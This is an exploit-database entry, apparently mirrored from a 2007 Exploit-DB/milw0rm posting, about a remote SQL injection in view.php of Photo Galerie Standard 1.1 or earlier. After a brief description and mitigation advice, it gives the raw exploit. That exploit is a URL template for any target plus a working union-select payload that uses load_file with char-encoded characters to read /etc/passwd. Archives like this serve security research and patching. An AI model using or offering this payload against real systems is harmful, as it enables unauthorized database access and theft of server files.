Photo Galerie Standard - exploit.company

vendor:

Photo Galerie Standard

by:

ajann

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: Photo Galerie Standard

Affected Version From: Photo Galerie Standard <= 1.1

Affected Version To: Photo Galerie Standard <= 1.1

Patch Exists: NO

Related CWE:

CPE: a:noname-media:photo_galerie_standard:1.1

Metasploit:

Other Scripts:

Platforms Tested:

2007

Photo Galerie Standard <= 1.1 (view.php) Remote SQL Injection Vulnerability

The Photo Galerie Standard <= 1.1 (view.php) is vulnerable to a remote SQL injection attack. By manipulating the 'id' parameter in the 'view.php' file, an attacker can execute arbitrary SQL queries on the underlying database. This can lead to unauthorized access, data theft, and other malicious activities.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Additionally, using prepared statements or parameterized queries can help prevent SQL injection attacks.

Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  Photo Galerie Standard <= 1.1 (view.php) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://noname-media.com
# $$      :  Free

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//view.php?id=[SQL]

Example:

etc/passwd Read

//view.php?id=-1%20union%20select%201,load_file(char((47,101,116,99,47,112,97,115,115,119,100)),3,4,0,0,0,0,0,0,0,0,0,0/*&categorie=8&next=1

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-02-03]